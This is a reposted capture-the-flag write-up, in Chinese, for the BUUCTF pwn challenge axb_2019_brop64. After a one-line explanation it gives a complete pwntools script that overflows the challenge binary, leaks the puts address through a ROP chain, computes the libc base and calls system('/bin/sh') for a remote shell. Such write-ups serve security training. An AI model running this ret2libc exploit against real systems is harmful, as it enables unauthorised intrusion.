[BUUCTF-pwn]——axb_2019_brop64
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——axb_2019_brop64
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——axb_2019_brop64
利用這里leek地址, 找到libc基地址進而找到system, binsh,構造rop鏈
exploit
from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',26212) #p = process('./axb_2019_brop64') elf = ELF('./axb_2019_brop64') context.log_level = 'debug' puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] main = elf.symbols['main'] pop_rdi = 0x0000000000400963 #gdb.attach(p)payload = "If there is a chance,I won't make any mistake!\n\x00" + 'a' * (0xd0+8 - 48) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main) p.sendafter('Please tell me:', payload) p.recvline() puts_addr = u64(p.recv(6).ljust(8,'\x00'))log.success("puts_addr -----> :" + hex(puts_addr)) libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") info("libc_base -----> " + hex(libc_base)) sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh") payload = "If there is a chance,I won't make any mistake!\n\x00" + 'a' * (0xd0+8 - 48) + p64(pop_rdi) + p64(binsh) + p64(sys_addr) + p64(main) p.sendafter('Please tell me:', payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——axb_2019_brop64的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——jarvis
- 下一篇: [BUUCTF-pwn]——wdb_20